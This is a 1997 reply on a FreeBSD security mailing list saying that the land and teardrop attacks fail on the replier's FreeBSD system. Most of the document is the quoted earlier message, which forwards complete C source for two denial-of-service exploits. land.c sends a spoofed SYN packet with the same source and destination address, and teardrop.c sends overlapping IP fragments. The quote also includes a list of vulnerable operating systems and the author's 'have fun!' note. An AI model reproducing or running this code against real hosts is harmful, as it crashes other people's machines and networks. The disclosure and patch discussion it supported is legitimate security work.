From owner-freebsd-security Mon Dec 29 15:45:58 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.7/8.8.7) id PAA24792 for security-outgoing; Mon, 29 Dec 1997 15:45:58 -0800 (PST) (envelope-from owner-freebsd-security) Received: from bsd.dialup.bestweb.net (geniusj@bsd.dialup.bestweb.net [209.94.111.13]) by hub.freebsd.org (8.8.7/8.8.7) with ESMTP id PAA24689; Mon, 29 Dec 1997 15:45:11 -0800 (PST) (envelope-from geniusj@bsd.dialup.bestweb.net) Received: (from geniusj@localhost) by bsd.dialup.bestweb.net (8.8.8/8.8.3) id NAA06278; Mon, 29 Dec 1997 13:45:17 -0500 (EST) Date: Mon, 29 Dec 1997 13:45:16 -0500 (EST) From: Wut!? To: "UC Computer / Transbay.Net" cc: bugs@freebsd.org, isp@freebsd.org, security@freebsd.org Subject: Re: Two sources for system-cracking tools In-Reply-To: <199712292140.NAA04641@transbay.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk That is a very old bug, in fact, I have tried the land bug on myself, and had other people try it on me. It doesn't affect anything.. I tried with ipfw off too . Teardrop DOES NOT work on FreeBSD and as far as I know wouldn't work on any system past 2.1.0, just a guess.. But I know teardrop doesn't work on 2.1.6+.. Well thats my pointless information for the day.. ------------------------------------------------------------------------------- geniusj or root@bsd.dialup.bestweb.net http://vlife.simplenet.com ------------------------------------------------------------------------------- On Mon, 29 Dec 1997, UC Computer / Transbay.Net wrote: > Here are two files concerning breaking into or trashing systems. One of these, > "land.c", says all versions of FreeBSD are susceptible to what it does. The > other (teardrop) may/not also work (w/w/o firewall), but should be of interest > anyway. I also have code to break in through INN < 1.6. > > All hail secure systems ... > > ******************************************************************************* > (land.c) > > [ http://www.rootshell.com/ ] > > This test where againts the "land" attack. This is _NOT_ about "teardrop". > > BSDI 2.1 (vanilla) IS vulnerable > BSDI 2.1 (K210-021,K210-022,K210-024) NOT vulnerable > BSDI 3.0 NOT vulnerable > Digital UNIX 4.0 NOT vulnerable > FreeBSD 2.2.2-RELEASE IS vulnerable > FreeBSD 2.2.5-RELEASE IS vulnerable > FreeBSD 2.2.5-STABLE IS vulnerable > FreeBSD 3.0-CURRENT IS vulnerable > HP-UX 10.20 IS vulnerable > IRIX 6.2 NOT vulnerable > Linux 2.0.30 NOT vulnerable > Linux 2.0.32 NOT vulnerable > MacOS 8.0 IS vulnerable (TCP/IP stack crashed) > NetBSD 1.2 IS vulnerable > NeXTSTEP 3.0 IS vulnerable > NeXTSTEp 3.1 IS vulnerable > Novell 4.11 NOT vulnerable > OpenBSD 2.1 IS vulnerable > OpenBSD 2.2 (Oct31) NOT vulnerable > SCO OpenServer 5.0.4 NOT vulnerable > Solaris 2.5.1 IS vulnerable (conflicting reports) > SunOS 4.1.4 IS vulnerable > Windows 95 (vanilla) IS vulnerable > Windows 95 + Winsock 2 + VIPUPD.EXE IS vulnerable > > Some misc stuff: > > Ascend Pipeline 50 rev 5.0Ap13 NOT vulnerable > NCD X Terminals, NCDWare v3.2.1 IS vulnerable > LaserJet Printer NOT vulnerable > > We got reports that applying the VTCPUPD update (originally the OOB attack > update) when applied to Windows 95 running Winsock 2 fixes the problem. > You may want to try it. You can download Vtcpupd.exe you > > http://support.microsoft.com/download/support/mslfiles/Vtcpupd.exe > > Thanks to Gonzo Granzeau for pointing > out the Windows 95 possible fix. Thanks to everyone else (to many to > mention). > > Date: Thu, 20 Nov 1997 19:40:19 -0500 > Reply-To: m3lt > Subject: new TCP/IP bug in win95 > > hi, > > i recently discovered a bug which freezes win95 boxes. here's how > it works: send a spoofed packet with the SYN flag set from a host, on an open > port (such as 113 or 139), setting as source the SAME host and port > (ie: 10.0.0.1:139 to 10.0.0.1:139). this will cause the win95 machine to lock > up. > > the piece of code included in this message does that, so... have fun! > > i haven't tested this bug on other platforms, i don't have the > ressources. please feel free to do so. > > m3lt > meltman@lagged.net > > --- snip snip ----------------------------------------------------------- > > /* land.c by m3lt, FLC > crashes a win95 box */ > > #include > #include > #include > #include > #include > #include > #include > #include > #include > > struct pseudohdr > { > struct in_addr saddr; > struct in_addr daddr; > u_char zero; > u_char protocol; > u_short length; > struct tcphdr tcpheader; > }; > > u_short checksum(u_short * data,u_short length) > { > register long value; > u_short i; > > for(i=0;i<(length>>1);i++) > value+=data[i]; > > if((length&1)==1) > value+=(data[i]<<8); > > value=(value&65535)+(value>>16); > > return(~value); > } > > int main(int argc,char * * argv) > { > struct sockaddr_in sin; > struct hostent * hoste; > int sock; > char buffer[40]; > struct iphdr * ipheader=(struct iphdr *) buffer; > struct tcphdr * tcpheader=(struct tcphdr *) (buffer+sizeof(struct iphdr)); > struct pseudohdr pseudoheader; > > fprintf(stderr,"land.c by m3lt, FLC\n"); > > if(argc<3) > { > fprintf(stderr,"usage: %s IP port\n",argv[0]); > return(-1); > } > > bzero(&sin,sizeof(struct sockaddr_in)); > sin.sin_family=AF_INET; > > if((hoste=gethostbyname(argv[1]))!=NULL) > bcopy(hoste->h_addr,&sin.sin_addr,hoste->h_length); > else if((sin.sin_addr.s_addr=inet_addr(argv[1]))==-1) > { > fprintf(stderr,"unknown host %s\n",argv[1]); > return(-1); > } > > if((sin.sin_port=htons(atoi(argv[2])))==0) > { > fprintf(stderr,"unknown port %s\n",argv[2]); > return(-1); > } > > if((sock=socket(AF_INET,SOCK_RAW,255))==-1) > { > fprintf(stderr,"couldn't allocate raw socket\n"); > return(-1); > } > > bzero(&buffer,sizeof(struct iphdr)+sizeof(struct tcphdr)); > ipheader->version=4; > ipheader->ihl=sizeof(struct iphdr)/4; > ipheader->tot_len=htons(sizeof(struct iphdr)+sizeof(struct tcphdr)); > ipheader->id=htons(0xF1C); > ipheader->ttl=255; > ipheader->protocol=IP_TCP; > ipheader->saddr=sin.sin_addr.s_addr; > ipheader->daddr=sin.sin_addr.s_addr; > > tcpheader->th_sport=sin.sin_port; > tcpheader->th_dport=sin.sin_port; > tcpheader->th_seq=htonl(0xF1C); > tcpheader->th_flags=TH_SYN; > tcpheader->th_off=sizeof(struct tcphdr)/4; > tcpheader->th_win=htons(2048); > > bzero(&pseudoheader,12+sizeof(struct tcphdr)); > pseudoheader.saddr.s_addr=sin.sin_addr.s_addr; > pseudoheader.daddr.s_addr=sin.sin_addr.s_addr; > pseudoheader.protocol=6; > pseudoheader.length=htons(sizeof(struct tcphdr)); > bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct tcphdr)); > tcpheader->th_sum=checksum((u_short *) &pseudoheader,12+sizeof(struct tcphdr)); > > if(sendto(sock,buffer,sizeof(struct iphdr)+sizeof(struct tcphdr),0,(struct sockaddr *) &sin,sizeof(struct sockaddr_in))==-1) > { > fprintf(stderr,"couldn't send packet\n"); > return(-1); > } > > fprintf(stderr,"%s:%s landed\n",argv[1],argv[2]); > > close(sock); > return(0); > } > > --- snip snip ----------------------------------------------------------- > ******************************************************************************* > (teardrop.c) > /* > * Copyright (c) 1997 route|daemon9 11.3.97 > * > * Linux/NT/95 Overlap frag bug exploit > * > * Exploits the overlapping IP fragment bug present in all Linux kernels and > * NT 4.0 / Windows 95 (others?) > * > * Based off of: flip.c by klepto > * Compiles on: Linux, *BSD* > * > * gcc -O2 teardrop.c -o teardrop > * OR > * gcc -O2 teardrop.c -o teardrop -DSTRANGE_BSD_BYTE_ORDERING_THING > */ > > #include > #include > #include > #include > #include > #include > #include > #include > #include > #include > #include > > #ifdef STRANGE_BSD_BYTE_ORDERING_THING > /* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */ > #define FIX(n) (n) > #else /* OpenBSD 2.1, all Linux */ > #define FIX(n) htons(n) > #endif /* STRANGE_BSD_BYTE_ORDERING_THING */ > > #define IP_MF 0x2000 /* More IP fragment en route */ > #define IPH 0x14 /* IP header size */ > #define UDPH 0x8 /* UDP header size */ > #define PADDING 0x1c /* datagram frame padding for first packet */ > #define MAGIC 0x3 /* Magic Fragment Constant (tm). Should be 2 or 3 */ > #define COUNT 0x1 /* Linux dies with 1, NT is more stalwart and can > * withstand maybe 5 or 10 sometimes... Experiment. > */ > void usage(u_char *); > u_long name_resolve(u_char *); > u_short in_cksum(u_short *, int); > void send_frags(int, u_long, u_long, u_short, u_short); > > int main(int argc, char **argv) > { > int one = 1, count = 0, i, rip_sock; > u_long src_ip = 0, dst_ip = 0; > u_short src_prt = 0, dst_prt = 0; > struct in_addr addr; > > fprintf(stderr, "teardrop route|daemon9\n\n"); > > if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) > { > perror("raw socket"); > exit(1); > } > if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one, sizeof(one)) > < 0) > { > perror("IP_HDRINCL"); > exit(1); > } > if (argc < 3) usage(argv[0]); > if (!(src_ip = name_resolve(argv[1])) || !(dst_ip = name_resolve(argv[2]))) > { > fprintf(stderr, "What the hell kind of IP address is that?\n"); > exit(1); > } > > while ((i = getopt(argc, argv, "s:t:n:")) != EOF) > { > switch (i) > { > case 's': /* source port (should be emphemeral) */ > src_prt = (u_short)atoi(optarg); > break; > case 't': /* dest port (DNS, anyone?) */ > dst_prt = (u_short)atoi(optarg); > break; > case 'n': /* number to send */ > count = atoi(optarg); > break; > default : > usage(argv[0]); > break; /* NOTREACHED */ > } > } > srandom((unsigned)(time((time_t)0))); > if (!src_prt) src_prt = (random() % 0xffff); > if (!dst_prt) dst_prt = (random() % 0xffff); > if (!count) count = COUNT; > > fprintf(stderr, "Death on flaxen wings:\n"); > addr.s_addr = src_ip; > fprintf(stderr, "From: %15s.%5d\n", inet_ntoa(addr), src_prt); > addr.s_addr = dst_ip; > fprintf(stderr, " To: %15s.%5d\n", inet_ntoa(addr), dst_prt); > fprintf(stderr, " Amt: %5d\n", count); > fprintf(stderr, "[ "); > > for (i = 0; i < count; i++) > { > send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt); > fprintf(stderr, "b00m "); > usleep(500); > } > fprintf(stderr, "]\n"); > return (0); > } > > /* > * Send two IP fragments with pathological offsets. We use an implementation > * independent way of assembling network packets that does not rely on any of > * the diverse O/S specific nomenclature hinderances (well, linux vs. BSD). > */ > > void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src_prt, > u_short dst_prt) > { > u_char *packet = NULL, *p_ptr = NULL; /* packet pointers */ > u_char byte; /* a byte */ > struct sockaddr_in sin; /* socket protocol structure */ > > sin.sin_family = AF_INET; > sin.sin_port = src_prt; > sin.sin_addr.s_addr = dst_ip; > > /* > * Grab some memory for our packet, align p_ptr to point at the beginning > * of our packet, and then fill it with zeros. > */ > packet = (u_char *)malloc(IPH + UDPH + PADDING); > p_ptr = packet; > bzero((u_char *)p_ptr, IPH + UDPH + PADDING); > > byte = 0x45; /* IP version and header length */ > memcpy(p_ptr, &byte, sizeof(u_char)); > p_ptr += 2; /* IP TOS (skipped) */ > *((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING); /* total length */ > p_ptr += 2; > *((u_short *)p_ptr) = htons(242); /* IP id */ > p_ptr += 2; > *((u_short *)p_ptr) |= FIX(IP_MF); /* IP frag flags and offset */ > p_ptr += 2; > *((u_short *)p_ptr) = 0x40; /* IP TTL */ > byte = IPPROTO_UDP; > memcpy(p_ptr + 1, &byte, sizeof(u_char)); > p_ptr += 4; /* IP checksum filled in by kernel */ > *((u_long *)p_ptr) = src_ip; /* IP source address */ > p_ptr += 4; > *((u_long *)p_ptr) = dst_ip; /* IP destination address */ > p_ptr += 4; > *((u_short *)p_ptr) = htons(src_prt); /* UDP source port */ > p_ptr += 2; > *((u_short *)p_ptr) = htons(dst_prt); /* UDP destination port */ > p_ptr += 2; > *((u_short *)p_ptr) = htons(8 + PADDING); /* UDP total length */ > > if (sendto(sock, packet, IPH + UDPH + PADDING, 0, (struct sockaddr *)&sin, > sizeof(struct sockaddr)) == -1) > { > perror("\nsendto"); > free(packet); > exit(1); > } > > /* We set the fragment offset to be inside of the previous packet's > * payload (it overlaps inside the previous packet) but do not include > * enough payload to cover complete the datagram. Just the header will > * do, but to crash NT/95 machines, a bit larger of packet seems to work > * better. > */ > p_ptr = &packet[2]; /* IP total length is 2 bytes into the header */ > *((u_short *)p_ptr) = FIX(IPH + MAGIC + 1); > p_ptr += 4; /* IP offset is 6 bytes into the header */ > *((u_short *)p_ptr) = FIX(MAGIC); > > if (sendto(sock, packet, IPH + MAGIC + 1, 0, (struct sockaddr *)&sin, > sizeof(struct sockaddr)) == -1) > { > perror("\nsendto"); > free(packet); > exit(1); > } > free(packet); > } > > u_long name_resolve(u_char *host_name) > { > struct in_addr addr; > struct hostent *host_ent; > > if ((addr.s_addr = inet_addr(host_name)) == -1) > { > if (!(host_ent = gethostbyname(host_name))) return (0); > bcopy(host_ent->h_addr, (char *)&addr.s_addr, host_ent->h_length); > } > return (addr.s_addr); > } > > void usage(u_char *name) > { > fprintf(stderr, > "%s src_ip dst_ip [ -s src_prt ] [ -t dst_prt ] [ -n how_many ]\n", > name); > exit(0); > } > > ******************************************************************************* >